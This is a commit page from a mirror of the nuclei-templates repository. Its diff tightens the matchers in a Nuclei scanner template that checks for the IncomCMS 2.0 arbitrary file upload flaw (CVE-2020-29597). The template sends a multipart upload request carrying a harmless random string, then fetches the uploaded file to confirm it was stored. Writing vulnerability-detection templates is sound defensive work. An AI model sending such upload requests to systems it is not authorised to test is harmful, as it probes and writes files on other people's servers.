daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added strict matchers (#4589)

patch-1
Sandeep Singh 2022-06-15 05:03:00 +05:30 committed by GitHub
parent 17ec5b993a
commit 0b8fe245cd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
cves/2020/CVE-2020-29597.yaml
View File

@ -1,4 +1,5 @@
id: CVE-2020-29597
info:
name: IncomCMS 2.0 - Arbitrary File Upload
author: princechaddha
@ -27,21 +28,27 @@ requests:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
------WebKitFormBoundaryBEJZt0IK73M2mAbt
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
Content-Type: image/png
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
Content-Type: text/html
{{randstr_2}}
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
- |
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
- status_code_2 == 200
condition: and
- type: word
part: body_1
words:
- '{"status":"1","name":"{{randstr_1}}.png"}'
- type: word
part: body_2
words:
- '{{randstr_2}}'
# Enhanced by CS 06/06/2022